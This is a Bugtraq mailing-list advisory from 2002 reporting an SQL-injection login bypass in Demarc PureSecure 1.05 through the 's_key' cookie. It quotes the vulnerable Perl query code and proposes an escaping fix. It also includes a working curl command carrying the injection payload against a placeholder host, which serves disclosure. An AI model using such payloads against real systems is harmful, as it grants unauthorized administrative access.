Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Demarc PureSecure 1.05 may be other (user can bypass login)

From: pokleyzz sakamaniaka <pokleyzz () hotmail com>
Date: 15 Apr 2002 07:32:18 -0000


Demarc PureSecure (http://www.demarc.org) is an 
all-inclusive network monitoring solution that allows 
you to monitor an entire network of servers from one 
powerful web interface.

user can bypass login and get admin status by sql 
injection through cookies s_key

--------- line 319 ------------------------------
elsif (($cookies{'s_key'}) && ($cookies{'s_key'}-

value)){

        $logged_in_as = &check_login($cookies
{'s_key'}->value);
        if (!$logged_in_as){
                   &print_login_screen;
                &safe_exit;
        }
-----------------------------------------------------

s_key  = will be use for sql in fuction check_login 
query ( line 6114)

---------lini 6114---------------------------------
$sql_query = "  SELECT \
                                        
        f1,f2,f3,admin,username,UNIX_TIMESTAMP
(current_login_timedate) AS LOGINTIME \
                                
        FROM \
                                        
        dm_sessions \
                                
        WHERE current_session_id 
= '$session_id' ";
-----------------------------------------------------

-=solution=-
line 6113: &safe_slash(\$session_id' );

using curl (http://curl.haxx.se/download/):
curl -b s_key=\'%20OR%20current_session_id%
20like%20\'%\'%23 https://<lame host>/dm/demarc


http://www.inetd-secure.net
http://www.mybsd.org
Previous By Date Next
Previous By Thread Next

Current thread: